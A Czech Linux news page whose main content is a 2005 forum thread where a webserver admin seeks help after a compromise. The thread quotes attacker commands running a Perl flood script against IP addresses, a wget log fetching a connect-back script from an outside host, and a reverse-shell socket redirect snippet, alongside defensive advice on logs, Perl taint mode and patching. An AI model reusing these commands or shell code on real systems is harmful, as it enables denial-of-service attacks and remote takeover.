abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×

dnes 08:00 | IT novinky

Andy Rubin, spoluzakladatel společnosti Android, jež byla v roce 2005 koupena Googlem, nyní CEO společnosti Essential Products, oznámil předprodej chytrého telefonu Essential. Telefon se začne rozesílat 1. září. Cena telefonu je 699 dolarů. Cena telefonu současně s 360° kamerou s rozlišením 4K byla stanovena na 749 dolarů. Kameru, v budoucnu i další příslušenství, lze k telefonu připojit pomocí konektoru s magnety.

Ladislav Hagara | Komentářů: 0
včera 13:44 | Zajímavý software

Evropská komise vydala novou verzi 1.4.0.1 svého open source v Javě naprogramovaného softwaru pro online průzkumy EUSurvey. Online dotazníky lze vytvářet na stránkách Evropské komise nebo si lze software stáhnout (zip a war) a nainstalovat lokálně. Zdrojové kódy jsou k dispozici pod licencí EUPL (European Union Public Licence).

Ladislav Hagara | Komentářů: 0
18.8. 23:55 | Komunita

Ubuntu 17.10 (Artful Aardvark) bude ve výchozím stavu zobrazovat Dok (Launcher). Jedná se o rozšíření GNOME Shellu Ubuntu Dock. To bylo forknuto z rozšíření Dash to Dock. Ukázka na YouTube [reddit].

Ladislav Hagara | Komentářů: 2
17.8. 15:33 | Nová verze

Byla vydána verze 17.08.0 KDE Aplikací (KDE Applications). Přehled novinek v kompletním seznamu změn a na stránce s dalšími informacemi. Aplikace kmag, kmousetool, kgoldrunner, kigo, konquest, kreversi, ksnakeduel, kspaceduel, ksudoku, kubrick, lskat a umbrello byly portovány na KDE Frameworks 5.

Ladislav Hagara | Komentářů: 0
17.8. 15:11 | Nová verze

Simon Long představil na blogu Raspberry Pi novou verzi 2017-08-16 linuxové distribuce Raspbian určené především pro jednodeskové miniaturní počítače Raspberry Pi. Společně s Raspbianem byl aktualizován také instalační nástroj NOOBS (New Out Of the Box Software). Nejnovější Raspbian je založen na Debianu 9 Stretch. Přehled novinek v poznámkách k vydání. Řešena je také bezpečnostní chyba Broadpwn (CVE-2017-9417).

Ladislav Hagara | Komentářů: 1
17.8. 12:33 | Nová verze

Byla vydána verze 3.2.0 programu pro skicování, malování a úpravu obrázků Krita. Přehled novinek v poznámkách k vydání a na YouTube.

Ladislav Hagara | Komentářů: 0
17.8. 11:44 | IT novinky

Minulý týden na šampionátu The International 2017 byl představen bot, který poráží profesionální hráče počítačové hry Dota 2. V nejnovějším příspěvku na blogu se organizace OpenAI o projektu více rozepsala a zveřejnila videozáznamy několika soubojů.

Ladislav Hagara | Komentářů: 7
16.8. 17:11 | Komunita

Byly zveřejněny videozáznamy přednášek z Fedora 26 Release Party konané 10. srpna v Praze.

Ladislav Hagara | Komentářů: 0
16.8. 15:33 | Komunita

Přesně před čtyřiadvaceti lety, 16. srpna 1993, oznámil Ian Murdock vydání "Debian Linux Release".

Ladislav Hagara | Komentářů: 8
16.8. 06:00 | Bezpečnostní upozornění

Ve virtualizačním softwaru Xen bylo nalezeno a opraveno 5 bezpečnostních chyb XSA-226 až XSA-230. Nejzávažnější z nich XSA-227 (CVE-2017-12137) umožňuje eskalaci privilegií a ovládnutí celého systému, tj. správce hostovaného systému se může stát správcem hostitelského systému.

Ladislav Hagara | Komentářů: 1
Těžíte nějakou kryptoměnu?
 (4%)
 (2%)
 (17%)
 (76%)
Celkem 358 hlasů
 Komentářů: 21, poslední 13.8. 09:57
    Rozcestník

    Dotaz: Průnik do webserveru :(

    29.8.2005 15:12 Rover | skóre: 10
    Průnik do webserveru :(
    Přečteno: 150×
    Zdravím, dneska jsme zaznamenali problém s počtem odeslaných paketů z našeho webserveru. Výpisem procesů jsem zjistil, že se spustili perlovské skritpy, které posílají cca 8000paketů/s na určitou ip adresu na port 80.

    ps ax -vypadal takto:

    sh -c cd /tmp;perl sbyte.t 67.43.159.2 80 99999999999 0 2>&1

    sh -c cd /tmp;perl sbyte.t 72.20.3.74 80 99999999999 16 2>&1

    ... z logů jsem zjistil, že byl tento(a ještě 3 další) nakopírovány z ip 195.213.50.200

    výpis logu apache

    --11:20:39-- http://www.asf.toscana.it/tmp/conback.pl => `conback.pl'

    Resolving www.asf.toscana.it... 159.213.50.200

    Connecting to www.asf.toscana.it[159.213.50.200]:80... connected.

    HTTP request sent, awaiting response... 200 OK Length: 1,100 [text/x-perl]

    OK . 100% 10.49 MB/s

    11:20:39 (10.49 MB/s) - `conback.pl' saved [1100/1100]

    -toto mi příjde, jako stažení pomocí wget. Nic víc jsem z logů nenašel,,, Pomocí ssh se na server nepřihlásil.

    Netušíte, kudy mohl útočník nahrát tyto skripty a hlavně jak je spustil??? Celkem by nám pomotal hlavu, kdyby nechal smazat celý adresář /var/www :(

    Odpovědi

    29.8.2005 16:35 petr_p
    Rozbalit Rozbalit vše Re: Průnik do webserveru :(
    Nicmene pochybuji, ze panum fungoval ten bindshell ;), kdyz v conback.pl maji toto:
    open(STDIN, ">&SOCKET");
    open(STDOUT, ">&SOCKET");
    
    29.8.2005 19:10 Rover | skóre: 10
    Rozbalit Rozbalit vše Re: Průnik do webserveru :(
    Tak koukám, že někdo opravdu už toto viděl a zažil....

    kdybyste chtěli, dám skripty conback.pl a sbyte.t k nahlédnutí...

    --Nejvíce by mě zajímalo, jak to tam dostali a jak to spustili? Ihned jsem aktualizoval Apache i perlové věcičky...
    29.8.2005 19:41 petr_p
    Rozbalit Rozbalit vše Re: Průnik do webserveru :(
    Ne, nezazil ani nevidel (vlaste jednou ano, ale to byl cizi stroj, kde bylo _velmi_ slabe heslo).

    Ten connback.pl jsem vytahnul z URL ve vasem postu. Nicmene sbyte.t by me zajimal. Podle popisu to vypada na DDoS utok.

    Kudy se tam dosali? Na to jste poskytnul malo informaci. Existuji v zasade dve moznosti. Bud vyuzili nejakou chybu typu buffer overflow v nejake webove aplikaci (pak ale ta aplikace musela byt dostatecne znama -- napr. phpBB).

    Nebo a to bych videl jako pravdepodobnejsi, mate chybu ve vasich perlovych skriptech (napr. escapovany shellovy prikaz ve zpetnych apostofech ze vstupu -- BTW, pouzivate tainted modul?). Na to by ukazoval vystup, ktery jste nasel v httpd logu -- stderr vystup vaseho skriptu, ktery spustil wget. Byl to vas skript (apache hlasi nazev skriptu, ktery produkuje chybovy vystup)?
    29.8.2005 20:07 Rover | skóre: 10
    Rozbalit Rozbalit vše Re: Průnik do webserveru :(
    DoS útok to je na 100% akorát, že náš server byl využit jako hostitelský stroj, ze kterého útok byl páchán.

    Moc se bohužel v typech průniků nevyznám. V logu u toho překopírování nic jiného není. Třeba náznak který skript to byl -opravdu nic. Perlové skripty používám málokdy. Vlastní přístupné z webu nemám, pouze ty komerční (cricket,smokeping...), ale ty počítám že zásadní chybu ve skriptu nemají.

    Z modulů apache používám:

    config_log_module, mime_module, negotiation_module, status_module, includes_module, autoindex_module, dir_module, cgi_module, speling_module, userdir_module, alias_module, rewrite_module, access_module, auth_module, expires_module, unique_id_module, setenvif_module, dav_module, php4_module

    pokuď máte zájem o ten druhý sbyte.t skript, dejte mi mailovku -pošlu Vám to. (teda pokuď to neobrátíte proti mě :) )
    29.8.2005 20:28 petr_p
    Rozbalit Rozbalit vše Re: Průnik do webserveru :(
    Za ten log se omlouvam, ted jsem si to overoval, a apache do error_logu opravdu (defaulne) nepise nazev skriptu, ktery neco vypoti na stderr. Kazdopadne jsem tam videl u vas cas. Podivejte se do access_logu na stejny cas. Najdete te tam vsechny http pozadavky, takze i nazvy skriptu, ktere byly pres HTTP volany.

    Tim tainted modulem jsem myslel perlovsky modul, ktery dokaze hlidat pohyb dat po skriptu a napr. odmine spustit prikaz, ktery pochazi ze vstupu od uzivatele.

    Kazdopadne, pokud nenajdete bezpecnosti chybu, doporucuji uktualizovat veskery sofwtare, ktery je volan z webovych skriptu a stroj po nejakou dobu hlidat. Pripadne napiste spravcovi site, ze ktere jste byl hacknut (pokud na to prijdete), protoze pravdepodobne i on byl kompromitovan.
    29.8.2005 20:45 Rover | skóre: 10
    Rozbalit Rozbalit vše Re: Průnik do webserveru :(
    Do access_logu jsem se už díval a žádný skript v tu dobu se nezpouštěl... to vypadá, že se nedostal přes web server :/ ... dále jsem zjistil z výpisu služeb, že byl spuštěn "časovač" - už si to přesně nepamatuji ale něco jako "sleep 9999999 && perl sbyte.t IP.add.rre.sa 999999999 80 &" to znamená, že se to mohlo spustit o několik hodin později.... a být zapsáno do logu někdy kdysi před pár dny :/

    Založit nové vláknoNahoru

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.